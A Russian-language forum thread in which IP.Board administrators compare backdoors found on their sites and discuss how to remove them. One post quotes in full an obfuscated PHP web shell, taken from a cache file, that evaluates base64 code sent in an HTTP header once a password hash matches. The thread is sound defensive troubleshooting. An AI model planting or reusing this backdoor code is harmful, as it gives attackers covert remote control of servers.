Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
siv1987

Security update

Рекомендованные сообщения

Не хочу показаться невнимательным, но я не нашел

Поделиться сообщением


Ссылка на сообщение

заметил на днях:

в /uploads/monthly 03_2013 (могут оказаться и другие директории)

файлы с точно такими же именами как и jpg, но имебщие расширение .ipb

внутри файла - аналогичное говно что и в zx.php и им подобным (см в этой теме)

лечение - удалить

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение

Backdoor новый обнаружился - \admin\sources\classes\class_private_permissions.php. Инит в class_permissions.php. Код не сохранили, к сожалению. Он поломал авторизацию на форуме, потому и нашли быстро.

Поделиться сообщением


Ссылка на сообщение

Здравствуйте.

Заметил и у себя эту заразу - photo-128.jpg в /uploads/profile ..

Так же две таблицы заражены в бд, как и описывалось в этой теме. В директории /cache/ был файл f894eade.php , с содержанием

<?php $_d9eceec="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_d9ecee="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_29d69c=$_d9eceec('',$_d9ecee('aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7'));$_29d69c();?>

, удалил.

Бэкапов того времени не сохранилось что бы подменить зараженные таблицы .. Как можно поправить ситуацию?

Поделиться сообщением


Ссылка на сообщение

Профи, помогите пожалуйста решить эту проблемку!

Поделиться сообщением


Ссылка на сообщение

Прочтите тему эту от А до Я.

 

Ваше решение.

 

Оно не только в photo-128.jpg может быть, но и под другими названиями. Извлеките всю папку на свой пк /uploads/profile

и пробежитесь по аватарам.

Поделиться сообщением


Ссылка на сообщение

Спасибо.

В директории /forum/hooks присутствует такой файл - alpha_e63f34c20c332f99431e93224eae471a.php

с содержанием -

<?php

class alpha
{
public function getOutput()
{
    $template = ipsRegistry::instance()->output->getTemplate('mlist')->member_alpha_ru();

       $js = <<<JS

			<script type='text/javascript'>
				$('alpha_switch').observe('click', function(){
						if( $('member_alpha_ru') )
						{
							$('member_alpha').toggle();
							$('member_alpha_ru').toggle();
						}
				} );

				$('alpha_switch_en').observe('click', function(){
						if( $('member_alpha') )
						{
							$('member_alpha').toggle();
							$('member_alpha_ru').toggle();
						}
				} );

JS;
       if ( ord( urldecode(ipsRegistry::$request['quickjump']) ) > 90 )
       {
           $js .= <<<JS
				$('member_alpha').toggle();
JS;
       }
       else
       {
           $js .= <<<JS
				$('member_alpha_ru').toggle();
JS;
       }

       $js .= <<<JS
			</script>
JS;

       return $template . $js;
}
}

Это тоже оно? Вроде бы раньше не было ..

Поделиться сообщением


Ссылка на сообщение

Вроде бы все директории проверил, файл photo-128.jpg удалил (появлялся несколько раз заново), таблицы на предмет -

photo-128.jpg и tmpgw4ia4

почистил ручками, переимпортировал все хуки и перестроил весь кэш. Пока полет нормальный.

Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.

Поделиться сообщением


Ссылка на сообщение

Он у всех есть.

Поделиться сообщением


Ссылка на сообщение

Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.

Это файл ибровского хука "Русские буквы в списке юзеров"

Поделиться сообщением


Ссылка на сообщение

Спасибо ребята, не дали пропасть!

Поделиться сообщением


Ссылка на сообщение

Вчера обнаружил массовые попытки войти в АЦ форума под отображаемым именем админа с IP:37.1.207.98 . Покурив интернет понял, что не у меня одного ..

Поделиться сообщением


Ссылка на сообщение

Поменяйте путь в АЦ

Поделиться сообщением


Ссылка на сообщение
05/23/13 13:18 (изменено)

Поменяйте путь в АЦ

Сразу же сменил. Удивило то, что почти у всех к кому приходили "гости" - форум IPB 3.*.* и один и тот же IP в журналах авторизации АЦ. Бот видит только отображаемое имя, его и вводит при попытке авторизоваться.

Изменено пользователем Minnow

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...